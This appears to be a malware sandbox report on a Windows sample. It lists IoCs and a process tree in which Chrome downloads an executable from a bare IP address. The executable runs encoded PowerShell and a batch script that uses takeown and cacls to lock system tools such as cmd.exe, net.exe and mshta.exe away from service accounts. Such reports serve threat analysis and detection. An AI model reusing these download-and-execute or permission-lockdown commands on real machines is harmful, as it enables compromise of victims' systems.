996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 996 wrote to memory of 3716	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 3716	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 292	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 2068	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 2068	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe
PID 996 wrote to memory of 4612	996	chrome.exe	chrome.exe

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

Processes:

a-Xgjsx.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"	a-Xgjsx.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" http://80.66.75.37/a-Xgjsx.exe
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc51a09758,0x7ffc51a09768,0x7ffc51a09778
2⤵
PID:3716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=1712,i,6398848510829472074,4934625051831616148,131072 /prefetch:8
2⤵
PID:2068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1608 --field-trial-handle=1712,i,6398848510829472074,4934625051831616148,131072 /prefetch:2
2⤵
PID:292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2120 --field-trial-handle=1712,i,6398848510829472074,4934625051831616148,131072 /prefetch:8
2⤵
PID:4612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2760 --field-trial-handle=1712,i,6398848510829472074,4934625051831616148,131072 /prefetch:1
2⤵
PID:1084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2724 --field-trial-handle=1712,i,6398848510829472074,4934625051831616148,131072 /prefetch:1
2⤵
PID:2488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5032 --field-trial-handle=1712,i,6398848510829472074,4934625051831616148,131072 /prefetch:8
2⤵
PID:3048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5020 --field-trial-handle=1712,i,6398848510829472074,4934625051831616148,131072 /prefetch:8
2⤵
PID:2984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 --field-trial-handle=1712,i,6398848510829472074,4934625051831616148,131072 /prefetch:8
2⤵
PID:4464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 --field-trial-handle=1712,i,6398848510829472074,4934625051831616148,131072 /prefetch:8
2⤵
PID:4804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 --field-trial-handle=1712,i,6398848510829472074,4934625051831616148,131072 /prefetch:8
2⤵
PID:4980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5280 --field-trial-handle=1712,i,6398848510829472074,4934625051831616148,131072 /prefetch:8
2⤵
PID:416

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5296 --field-trial-handle=1712,i,6398848510829472074,4934625051831616148,131072 /prefetch:8
2⤵
PID:4344

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 --field-trial-handle=1712,i,6398848510829472074,4934625051831616148,131072 /prefetch:8
2⤵
PID:3496

C:\Users\Admin\Downloads\a-Xgjsx.exe
"C:\Users\Admin\Downloads\a-Xgjsx.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wvjrrzxdkill$-arab.bat" "
3⤵
PID:904

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
4⤵
PID:2124

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\cmd.exe /a
4⤵
- Modifies file permissions
PID:1484

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /g Administrators:f
4⤵
PID:4164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:8

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:5016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g Users:r
4⤵
PID:4124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4804

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
4⤵
PID:3368

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:368

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d SERVICE
4⤵
PID:1488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1408

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
4⤵
PID:4212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
- Executes dropped EXE
PID:820

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d "network service"
4⤵
PID:1232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:396

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g system:r
4⤵
PID:2988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:2432

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
4⤵
PID:4308

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\cmd.exe /a
4⤵
- Modifies file permissions
PID:4160

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
4⤵
PID:4444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2872

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
4⤵
PID:2716

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
4⤵
PID:2688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4064

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
4⤵
PID:2904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2352

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
4⤵
PID:4896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:4372

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
4⤵
PID:4108

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
4⤵
PID:3216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:3928

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
4⤵
PID:3208

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\net.exe /a
4⤵
- Modifies file permissions
PID:3404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2344

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /g Administrators:f
4⤵
PID:1804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4728

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /g Users:r
4⤵
PID:2040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:204

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /g Administrators:r
4⤵
PID:1740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:196

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d SERVICE
4⤵
PID:2492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:628

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d mssqlserver
4⤵
PID:2428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:2516

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d "network service"
4⤵
PID:4428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4788

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d system
4⤵
PID:4460

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
4⤵
PID:8

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:3552

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\net.exe /a
4⤵
- Modifies file permissions
PID:4132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3940

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
4⤵
PID:4860

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
4⤵
PID:740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Service2
5⤵
PID:2084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4156

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
4⤵
PID:1316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2456

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
4⤵
PID:2324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3216

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
4⤵
PID:4744

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
4⤵
PID:1012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:2096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2876

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d system
4⤵
PID:4972

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
4⤵
PID:4048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:1560

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\net1.exe /a
4⤵
- Modifies file permissions
PID:4804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:260

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /g Administrators:f
4⤵
PID:268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1804

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /g Users:r
4⤵
PID:300

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /g Administrators:r
4⤵
PID:3708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:252

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d SERVICE
4⤵
PID:1220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3500

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d mssqlserver
4⤵
PID:1488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:368

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:1000

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d "network service"
4⤵
PID:2040

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d system
4⤵
PID:1468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1616

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
4⤵
PID:1632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:2168

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\net1.exe /a
4⤵
- Modifies file permissions
PID:3496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2124

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
4⤵
PID:1424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:196

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
4⤵
PID:2380

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
4⤵
PID:1128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
4⤵
PID:408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4752

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
4⤵
PID:1732

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
4⤵
PID:3804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:3992

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d system
4⤵
PID:4484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4308

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
4⤵
PID:4304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:4776

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\mshta.exe /a
4⤵
- Modifies file permissions
PID:3744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3584

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /g Administrators:f
4⤵
PID:4572

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /g Users:r
4⤵
PID:4448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4520

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
4⤵
PID:2160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4792

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d SERVICE
4⤵
PID:4780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3612

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
4⤵
PID:4428

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d "network service"
4⤵
PID:2688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:4328

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d system
4⤵
PID:4408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:4356

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
4⤵
PID:4372

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\mshta.exe /a
4⤵
- Modifies file permissions
PID:4784

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
4⤵
PID:1596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4740

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
4⤵
PID:2812

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
4⤵
PID:2228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2120

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
4⤵
PID:3032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2816

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
4⤵
PID:4864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4116

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
4⤵
PID:2672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:3552

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d system
4⤵
PID:992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:4940

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
4⤵
PID:3980

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\FTP.exe /a
4⤵
- Modifies file permissions
PID:2632

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /g Administrators:f
4⤵
PID:3928

